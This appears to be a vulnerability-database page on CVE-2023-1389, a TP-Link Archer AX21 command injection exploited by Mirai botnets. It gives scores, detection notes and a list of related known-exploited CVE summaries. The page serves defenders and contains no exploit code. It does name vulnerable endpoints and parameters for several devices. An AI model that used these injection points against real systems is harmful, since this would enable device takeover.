CVE-2023-1389
published 2023-03-15CVE-2023-1389: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the…
PriorityP191high8.8CVSS 3.1
AVAACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-05-22
Exploited in the wild
EPSS
100.00%
100.0th percentile
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | archer_ax21_firmware | < 1.1.4 | 1.1.4 |
Detection & IOCsextracted from sources · hover to see the quote
- →The vulnerability is an unauthenticated command injection in the locale API's 'country' form write operation on the TP-Link Archer AX21 web management interface. Monitor for HTTP POST/write requests to the locale API endpoint targeting the 'country' field with shell metacharacters. ↗
- →Mirai payloads for CVE-2023-1389 use XOR keys 0x00 and 0x22 to encrypt strings. Scanning for these XOR-encoded Mirai binaries can aid in payload identification. ↗
- →Mirai bots exploiting CVE-2023-1389 use specific User-Agent strings and server headers including 'cloudflare-nginx' and 'dosarrest' to blend DDoS traffic with legitimate traffic. Alert on these headers in outbound traffic from router/IoT devices. ↗
- →CVE-2023-1389 exploitation activity was first observed on April 11, 2023, initially targeting devices in Eastern Europe. Correlate telemetry for TP-Link Archer AX21 exploitation attempts originating from Eastern European IPs around that timeframe. ↗
- →CVE-2023-1389 was the 3rd most exploited CVE by volume in March 2025 with 4,698 attempts recorded. Prioritize detection rules for this CVE given its continued active exploitation. ↗
- →A Mirai-based botnet campaign abused CVE-2023-1389 on TP-Link Archer AX21 routers targeting Brazilian internet providers, using open DNS servers for high-volume amplification attacks. Monitor for anomalous DNS amplification traffic from compromised TP-Link devices. ↗
- ·The Mirai botnet payloads are downloaded and executed using a brute-force methodology to find the appropriate payload for the target system architecture, meaning multiple architecture-specific binaries are tried sequentially. Detection should account for multiple sequential download attempts from the same C2 IP across different architecture paths. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulnCheck
TBK DVR Command Injection Vulnerability
vulncheck·2024·CVSS 6.3
CVE-2024-3721 [MEDIUM] TBK DVR Command Injection Vulnerability
TBK DVR Command Injection Vulnerability
A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely.
Affected: TBK TBK DVR
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-21&host_type=src&vulnerability=cve-2024-3721; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-22&host_type=src&vulner
VulnCheck
D-Link Multiple NAS Devices Command Injection Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-3273 [CRITICAL] CWE-77 D-Link Multiple NAS Devices Command Injection Vulnerability
D-Link Multiple NAS Devices Command Injection Vulnerability
D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L contain a command injection vulnerability. When combined with CVE-2024-3272, this can lead to remote, unauthorized code execution.
Affected: D-Link Multiple NAS Devices
Required Action: This vulnerability affects legacy D-Link products. All associated hardware revisions have reached their end-of-life (EOL) or end-of-service (EOS) life cycle and should be retired and replaced per vendor instructions.
Exploitation References: https://infosec.exchange/@greynoise/112236315274772968; https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-09&host_type=src&vulnerability=cve-
VulnCheck
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Affected: Rejetto HTTP File Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://asec.ahnlab.com/ko/67509/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cert.gov.ua/article/6280129; https://www.f5.com/labs/articles/threat-intelligen
VulnCheck
Tenda AC18 V15.03.05.05 Firmware formexeCommand Function Command Injection
vulncheck·2024·CVSS 8.8
CVE-2024-30891 [HIGH] Tenda AC18 V15.03.05.05 Firmware formexeCommand Function Command Injection
Tenda AC18 V15.03.05.05 Firmware formexeCommand Function Command Injection
A command injection vulnerability exists in /goform/exeCommand in Tenda AC18 v15.03.05.05, which allows attackers to construct cmdinput parameters for arbitrary command execution.
Affected: Tenda AC18
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/ma
VulnCheck
PHP-CGI OS Command Injection Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-4577 [CRITICAL] CWE-78 PHP-CGI OS Command Injection Vulnerability
PHP-CGI OS Command Injection Vulnerability
PHP, specifically Windows-based PHP used in CGI mode, contains an OS command injection vulnerability that allows for arbitrary code execution. This vulnerability is a patch bypass for CVE-2012-1823.
Affected: PHP Group PHP
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.imperva.com/blog/imperva-protects-against-critical-php-vulnerability-cve-2024-4577/; https://x.com/Shadowserver/status/1799053497490698548; https://infosec.exchange/@ntkramer/112582375921224782; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2024-4577; https://isc.sans.edu/diary/Attacker%20Probing%20for%20New%20PHP%20Vu
VulnCheck
Four-Faith adjust_sys_time OS Command Injection
vulncheck·2024·CVSS 7.2
CVE-2024-12856 [HIGH] Four-Faith adjust_sys_time OS Command Injection
Four-Faith adjust_sys_time OS Command Injection
Four-Faith industrial routers are vulnerable to an operating system command injection vulnerability.
Affected: Four-Faith F3x24 and F3x36
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://ducklingstudio.blog.fc2.com/blog-entry-392.html; https://vulncheck.com/blog/four-faith-cve-2024-12856; https://www.cve.org/CVERecord?id=CVE-2024-12856; https://blog.xlab.qianxin.com/gayfemboy-en/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-08&host_type=src&vulnerability=cve-2024-12856;
GHSA
GHSA-h49r-m2rg-6pgf: TP-Link Archer AX21 (AX1800) firmware versions before 1
ghsa_unreviewed·2023-03-16
CVE-2023-1389 [HIGH] CWE-77 GHSA-h49r-m2rg-6pgf: TP-Link Archer AX21 (AX1800) firmware versions before 1
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
VulnCheck
Joomla! Improper Access Control Vulnerability
vulncheck·2023·CVSS 5.3
CVE-2023-23752 [MEDIUM] CWE-284 Joomla! Improper Access Control Vulnerability
Joomla! Improper Access Control Vulnerability
Joomla! contains an improper access control vulnerability that allows unauthorized access to webservice endpoints.
Affected: Joomla! Joomla!
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/rss/29614; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shad
VulnCheck
ZTE mf833u1_firmware Improper Input Validation
vulncheck·2023·CVSS 4.3
CVE-2023-25651 [MEDIUM] ZTE mf833u1_firmware Improper Input Validation
ZTE mf833u1_firmware Improper Input Validation
There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak.
Affected: ZTE mf833u1_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
git-commit-info_project git-commit-info Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-26134 [CRITICAL] git-commit-info_project git-commit-info Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
git-commit-info_project git-commit-info Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo () fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the hash content.
Affected: git-commit-info_project git-commit-info
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
TP-Link Archer AX-21 Command Injection Vulnerability
vulncheck·2023·CVSS 8.8
CVE-2023-1389 [HIGH] CWE-77 TP-Link Archer AX-21 Command Injection Vulnerability
TP-Link Archer AX-21 Command Injection Vulnerability
TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution.
Affected: TP-Link Archer AX21
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2023-1389; https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389; https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/; https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsen
VulnCheck
OSGeo GeoServer Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-25157 [CRITICAL] OSGeo GeoServer Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
OSGeo GeoServer Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *prepared
VulnCheck
contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-23333 [CRITICAL] contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Affected: contec solarview_compact
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://vulncheck.com/blog/solarview-exploitation; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-16&host_type=src&vulnerability=cve-2023-23333; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cv
VulnCheck
OSGeo GeoServer Improper Input Validation
vulncheck·2022·CVSS 7.2
CVE-2022-24847 [HIGH] OSGeo GeoServer Improper Input Validation
OSGeo GeoServer Improper Input Validation
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The GeoServer security mechanism can perform an unchecked JNDI lookup, which in turn can be used to perform class deserialization and result in arbitrary code execution. The same can happen while configuring data stores with data sources located in JNDI, or while setting up the disk quota mechanism. In order to perform any of the above changes, the attack needs to have obtained admin rights and use either the GeoServer GUI, or its REST API. The lookups are going to be restricted in GeoServer 2.21.0, 2.20.4, 1.19.6. Users unable to upgrade should restrict access to the `geoserver/web` and `geoserver/rest` via a firewall and ensure that t
VulnCheck
VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-22954 [CRITICAL] CWE-94 VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability
VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability
VMware Workspace ONE Access and Identity Manager allow for remote code execution due to server-side template injection.
Affected: VMware Workspace ONE Access and Identity Manager
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.vmware.com/security/advisories/VMSA-2022-0011.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.morphisec.com/vmware-identity-manager-attack-backdoor; https://cisa.gov/news-events/alerts/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related-vmware; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot
VulnCheck
thinkphp ThinkPHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2022·CVSS 9.8
CVE-2022-47945 [CRITICAL] thinkphp ThinkPHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
thinkphp ThinkPHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
Affected: thinkphp ThinkPHP
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-11&host_type=src&vulnerability=cve-2022-47945; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
VulnCheck
Microsoft Exchange Server Server-Side Request Forgery Vulnerability
vulncheck·2022·CVSS 8.8
CVE-2022-41040 [HIGH] CWE-918 Microsoft Exchange Server Server-Side Request Forgery Vulnerability
Microsoft Exchange Server Server-Side Request Forgery Vulnerability
Microsoft Exchange Server allows for server-side request forgery. Dubbed "ProxyNotShell," this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html; https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2022-Sep; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://securelist.com/cve-20
VulnCheck
Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-26134 [CRITICAL] CWE-917 Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.
Affected: Atlassian Confluence Server and Data Center
Required Action: Immediately block all internet traffic to and from affected products AND apply the update per vendor instructions [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html] OR remove the affected products by the due date on the right. Note: Once the update is successfully deployed, agencies can reassess the internet blocking rules.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.countercraftsec.com/blog/active-
VulnCheck
Sophos Firewall Authentication Bypass Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-1040 [CRITICAL] CWE-158 Sophos Firewall Authentication Bypass Vulnerability
Sophos Firewall Authentication Bypass Vulnerability
An authentication bypass vulnerability in User Portal and Webadmin of Sophos Firewall allows for remote code execution.
Affected: Sophos Firewall
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.bleepingcomputer.com/news/security/hackers-tried-to-use-sophos-firewall-zero-day-to-deploy-ransomware/; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-1040; https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/; ht
VulnCheck
memberhero member_hero Improper Control of Generation of Code ('Code Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-0885 [CRITICAL] memberhero member_hero Improper Control of Generation of Code ('Code Injection')
memberhero member_hero Improper Control of Generation of Code ('Code Injection')
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
Affected: memberhero member_hero
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
xmlsitemapgenerator xml_sitemap_generator Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2022·CVSS 6.1
CVE-2022-0346 [MEDIUM] xmlsitemapgenerator xml_sitemap_generator Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
xmlsitemapgenerator xml_sitemap_generator Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The XML Sitemap Generator for Google WordPress plugin before 2.0.4 does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
Affected: xmlsitemapgenerator xml_sitemap_generator
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-02&host_type=src&vulnerability=cve-2022-0346; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&h
VulnCheck
cozmoslabs profile_builder Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2022·CVSS 6.1
CVE-2022-0653 [MEDIUM] cozmoslabs profile_builder Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
cozmoslabs profile_builder Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The Profile Builder – User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.
Affected: cozmoslabs profile_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articl
VulnCheck
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 8.0
CVE-2022-2488 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-2488; https://dashboard.shadowserver.org/statistics/
VulnCheck
VMware Spring Cloud Gateway Code Injection Vulnerability
vulncheck·2022·CVSS 10.0
CVE-2022-22947 [CRITICAL] CWE-94 VMware Spring Cloud Gateway Code Injection Vulnerability
VMware Spring Cloud Gateway Code Injection Vulnerability
Spring Cloud Gateway applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.
Affected: VMware Spring Cloud Gateway
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-24-PalotayZsigovits.pdf; https://www.bleepingcomputer.com/news/security/microsoft-sysrv-botnet-targets-windows-linux-servers-with-new-exploits/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.malwarebytes.com/blog/news/2022/05/sysrv-botnet-is-out-to-mine-monero-on-your-windows-and-linux-servers; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolvin
VulnCheck
Teclib GLPI Remote Code Execution Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-35914 [CRITICAL] CWE-74 Teclib GLPI Remote Code Execution Vulnerability
Teclib GLPI Remote Code Execution Vulnerability
Teclib GLPI contains a remote code execution vulnerability in the third-party library, htmlawed.
Affected: Teclib GLPI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://glpi-project.org/security-update-10-0-3-and-9-5-9/; https://twitter.com/Shadowserver/status/1580475994590220288; https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-001.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/documents/MDDR_FINAL_2023_1004.pdf; https://dashboard.shadowserver.org/statistics/hone
VulnCheck
Spring Framework JDK 9+ Remote Code Execution Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-22965 [CRITICAL] CWE-94 Spring Framework JDK 9+ Remote Code Execution Vulnerability
Spring Framework JDK 9+ Remote Code Execution Vulnerability
Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.
Affected: VMware Spring Framework
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html; https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities; https://blog.netlab.360.com/new-ddos-botnet-wszeor/; https:
VulnCheck
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 8.0
CVE-2022-2486 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
VulnCheck
unisharp laravel_filemanager Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2022·CVSS 6.5
CVE-2022-40734 [MEDIUM] unisharp laravel_filemanager Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
unisharp laravel_filemanager Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0.
Affected: unisharp laravel_filemanager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2022-40734; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-40734; https://dashboard.shadowserver.org/statistics/hone
VulnCheck
Oracle E-Business Suite Unspecified Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-21587 [CRITICAL] CWE-306 Oracle E-Business Suite Unspecified Vulnerability
Oracle E-Business Suite Unspecified Vulnerability
Oracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator.
Affected: Oracle E-Business Suite
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://go.crowdstrike.com/rs/281-OBQ-266/images/report-crowdstrike-2023-threat-hunting-report.pdf; https://information.rapid7.com/rs/411-NAK-970/images/Rapid7-2023-Mid-Year-Threat-Review.pdf; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-03&host_type=src&vulnerability=cve-2022-
VulnCheck
Apache Spark Command Injection Vulnerability
vulncheck·2022·CVSS 8.8
CVE-2022-33891 [HIGH] CWE-78 Apache Spark Command Injection Vulnerability
Apache Spark Command Injection Vulnerability
Apache Spark contains a command injection vulnerability via Spark User Interface (UI) when Access Control Lists (ACLs) are enabled.
Affected: Apache Spark
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/; https://fortiguard.fortinet.com/threat-signal-report/4926/new-zerobot-variant-exploits-additional-vulnerabilities-for-propagation; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-33891; https://dashboard.shadowserver.org/statistics/honeypot
VulnCheck
Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-42475 [CRITICAL] CWE-197 Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability
Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability
Multiple versions of Fortinet FortiOS SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute arbitrary code or commands via specifically crafted requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.fortiguard.com/psirt/FG-IR-22-398; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw; https://www.prio-n.com/a-year-in-review-2022-100-vulnerabilities-you-sh
VulnCheck
hytec hwl-2511-ss_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-36553 [CRITICAL] hytec hwl-2511-ss_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
hytec hwl-2511-ss_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
Affected: hytec hwl-2511-ss_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
